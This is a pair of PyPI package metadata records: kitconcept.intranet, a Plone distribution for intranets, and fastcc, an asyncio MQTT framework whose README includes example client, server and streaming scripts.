2.4 | kitconcept.intranet | 1.0.0b28 | A Plone distribution for Intranets with Plone. Created by kitconcept. | # kitconcept.intranet
A Plone distribution for Intranets with Plone. Created by kitconcept.
## Installation
Install kitconcept.intranet with `pip`:
```shell
pip install kitconcept.intranet
```
And to create the Plone site:
```shell
make create_site
```
## Contribute
- [Issue Tracker](https://github.com/kitconcept/kitconcept.intranet/issues)
- [Source Code](https://github.com/kitconcept/kitconcept.intranet/)
## License
The project is licensed under GPLv2.
## Credits and Acknowledgements 🙏
Crafted with care by **kitconcept GmbH**. This project was generated by [cookiecutter-plone](https://github.com/plone/cookieplone-templates/backend_addon) on 2024-05-28 22:07:17. A special thanks to all contributors and supporters!
| text/markdown | null | kitconcept GmbH <info@kitconcept.com> | null | null | null | CMS, Intranet, Plone, Python | [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Plone",
"Framework :: Plone :: 6.1",
"Framework :: Plone :: Distribution",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.12"
] | [] | null | null | ==3.12.* | [] | [] | [] | [
"kitconcept-core==1.0.6",
"kitconcept-solr==2.0.0a3",
"pas-plugins-authomatic==2.0.0",
"pas-plugins-keycloakgroups==1.0.0b1",
"pas-plugins-oidc==2.0.0",
"plone-api",
"plone-distribution",
"plone-restapi",
"plone-volto>=5.1.0",
"python-dateutil",
"redturtle-rssservice==2.2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/kitconcept/kitconcept.intranet",
"PyPI, https://pypi.python.org/pypi/kitconcept.intranet",
"Source, https://github.com/kitconcept/kitconcept.intranet",
"Tracker, https://github.com/kitconcept/kitconcept.intranet/issues"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T08:57:51.970056 | kitconcept_intranet-1.0.0b28.tar.gz | 71,316,039 | 76/aa/b4e806514ce995169b2d57167f93e50a351f6b53951b41b5dc93180976ab/kitconcept_intranet-1.0.0b28.tar.gz | source | sdist | null | false | ef9723f88b6fd2e1a1712e4ae4f494e2 | 18a007063c23af33e6a0150e6905c4f42ffe1db18b6e59f22af8aa917d0e8f18 | 76aab4e806514ce995169b2d57167f93e50a351f6b53951b41b5dc93180976ab | MIT | [
"LICENSE.GPL",
"LICENSE.md"
] | 0 |
2.4 | fastcc | 5.2.2 | Lightweight, efficient and developer-friendly framework for mqtt communication. | <p align="center">
<img
src="https://github.com/ReMi-HSBI/fastcc/blob/main/docs/src/static/images/logos/fastcc.svg?raw=true"
alt="FastCC Logo"
width="33%"
/>
</p>
# FastCC
<a href="https://docs.astral.sh/ruff">
<img
src="https://img.shields.io/badge/ruff-⚡-261230.svg?style=flat-square"
alt="Ruff"
/>
</a>
<a href="https://mypy-lang.org">
<img
src="https://img.shields.io/badge/mypy-📝-2a6db2.svg?style=flat-square"
alt="Mypy"
/>
</a>
<a href="https://gitmoji.dev">
<img
src="https://img.shields.io/badge/gitmoji-😜%20😍-FFDD67.svg?style=flat-square"
alt="Gitmoji"
/>
</a>
FastCC is a [Python](https://www.python.org) package that simplifies
[MQTT](https://mqtt.org) communication using decorators. With its
intuitive `@route` system, developers can quickly define MQTT message
handlers without boilerplate code. FastCC natively supports
[Protocol Buffers](https://protobuf.dev) :boom:, automatically handling
serialization to byte format for efficient and structured data exchange.
- Lightweight :zap:
- Efficient :rocket:
- Developer-friendly :technologist:
This project is built on top of [aiomqtt](https://github.com/empicano/aiomqtt)
which itself is built on top of [paho-mqtt](https://eclipse.dev/paho).
# Examples
## client.py
```python
import asyncio
import contextlib
import logging
import os
import sys

import fastcc

_logger = logging.getLogger(__name__)


async def main() -> None:
    """Run the app."""
    logging.basicConfig(level=logging.DEBUG)
    async with fastcc.Client("localhost") as client:
        try:
            response = await client.request(
                "greet/doe",
                "Charlie",
                response_type=str,
            )
        except fastcc.RequestError as e:
            details = f"An error occurred on the server: {e}"
            _logger.error(details)
        response = await client.request("greet/doe", "Alice", response_type=str)
        _logger.info("response: %r", response)


loop_factory: type[asyncio.AbstractEventLoop] | None = None

# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
    loop_factory = asyncio.SelectorEventLoop

with contextlib.suppress(KeyboardInterrupt):
    asyncio.run(main(), loop_factory=loop_factory)
```
## app.py
```python
import asyncio
import contextlib
import logging
import os
import sys

import fastcc

router = fastcc.Router()


@router.route("greet/{family}")
async def greet(packet: str, family: str, *, database: dict[str, int]) -> str:
    """Greet a user.

    Parameters
    ----------
    packet
        The name of the user.
        Autofilled by fastcc.
    family
        The family of the user.
        Autofilled by fastcc.
    database
        The database.
        Autofilled by fastcc.

    Returns
    -------
    str
        The greeting message.
    """
    # ... do some async work
    await asyncio.sleep(0.1)
    database[packet] += 1
    occurrence = database[packet]
    return (
        f"Hello, {packet} from the {family} family! Saw you {occurrence} times!"
    )


async def main() -> None:
    """Run the app."""
    logging.basicConfig(level=logging.DEBUG)
    database: dict[str, int] = {"Alice": 0, "Bob": 0}
    async with fastcc.Application("localhost") as app:
        app.add_router(router)
        app.add_injector(database=database)
        app.add_exception_handler(
            KeyError,
            lambda e: fastcc.RequestError(repr(e), fastcc.Status.NOT_FOUND),
        )
        await app.run()


loop_factory: type[asyncio.AbstractEventLoop] | None = None

# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
    loop_factory = asyncio.SelectorEventLoop

with contextlib.suppress(KeyboardInterrupt):
    asyncio.run(main(), loop_factory=loop_factory)
```
## stream_client.py
```python
import asyncio
import contextlib
import logging
import os
import sys

import fastcc

_logger = logging.getLogger(__name__)


async def main() -> None:
    """Run the app."""
    logging.basicConfig(level=logging.DEBUG)
    async with fastcc.Client("localhost") as client:
        try:
            async for response in client.stream(
                "greet",
                "Charlie",
                response_type=str,
            ):
                _logger.info("response: %r", response)
        except fastcc.RequestError as e:
            details = f"An error occurred on the server: {e}"
            _logger.error(details)
        async for response in client.stream(
            "greet",
            "Alice",
            response_type=str,
        ):
            _logger.info("response: %r", response)


loop_factory: type[asyncio.AbstractEventLoop] | None = None

# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
    loop_factory = asyncio.SelectorEventLoop

with contextlib.suppress(KeyboardInterrupt):
    asyncio.run(main(), loop_factory=loop_factory)
```
## stream_app.py
```python
import asyncio
import contextlib
import logging
import os
import sys
from collections.abc import AsyncIterator  # noqa: TC003

import fastcc

router = fastcc.Router()


@router.route("greet")
async def greet(
    packet: str,
    *,
    database: dict[str, int],
) -> AsyncIterator[str]:
    """Greet a user.

    Parameters
    ----------
    packet
        The name of the user.
        Autofilled by fastcc.
    database
        The database.
        Autofilled by fastcc.

    Yields
    ------
    str
        The greeting message.
    """
    # ... do some async work
    await asyncio.sleep(0.1)
    for _ in range(2):
        database[packet] += 1
        occurrence = database[packet]
        yield f"Hello, {packet}! Saw you {occurrence} times!"


async def main() -> None:
    """Run the app."""
    logging.basicConfig(level=logging.DEBUG)
    database: dict[str, int] = {"Alice": 0, "Bob": 0}
    async with fastcc.Application("localhost") as app:
        app.add_router(router)
        app.add_injector(database=database)
        app.add_exception_handler(
            KeyError,
            lambda e: fastcc.RequestError(repr(e), fastcc.Status.NOT_FOUND),
        )
        await app.run()


loop_factory: type[asyncio.AbstractEventLoop] | None = None

# See: https://github.com/empicano/aiomqtt#note-for-windows-users
if sys.platform.lower() == "win32" or os.name.lower() == "nt":
    loop_factory = asyncio.SelectorEventLoop

with contextlib.suppress(KeyboardInterrupt):
    asyncio.run(main(), loop_factory=loop_factory)
```
| text/markdown | null | "J. Baudisch" <justin.baudisch@hsbi.de> | null | "J. Baudisch" <justin.baudisch@hsbi.de> | null | mqtt, protobuf, aiomqtt, asyncio, iot | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Communications",
"Programming Language :: Python",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Typing :: Typed"
] | [] | null | null | >=3.14 | [] | [] | [] | [
"paho-mqtt",
"aiomqtt",
"protobuf",
"ruff; extra == \"dev\"",
"mypy; extra == \"dev\"",
"Sphinx; extra == \"dev\"",
"furo; extra == \"dev\"",
"types-protobuf; extra == \"dev\"",
"pytest; extra == \"dev\"",
"pytest-asyncio; extra == \"dev\""
] | [] | [] | [] | [
"Repository, https://github.com/ReMi-HSBI/fastcc"
] | twine/6.2.0 CPython/3.14.3 | 2026-02-20T08:57:42.510772 | fastcc-5.2.2.tar.gz | 19,700 | fe/12/20cb5331080c78c24d752185168ea6e71b4848d03b42cd743e6891fb6ab6/fastcc-5.2.2.tar.gz | source | sdist | null | false | b7e771d04ec2ca2e817e13e36773cef8 | 95baaa83e1e093ba837862706d7fd18e69e3532893885c9ab4bf4b834d849033 | fe1220cb5331080c78c24d752185168ea6e71b4848d03b42cd743e6891fb6ab6 | null | [] | 210 |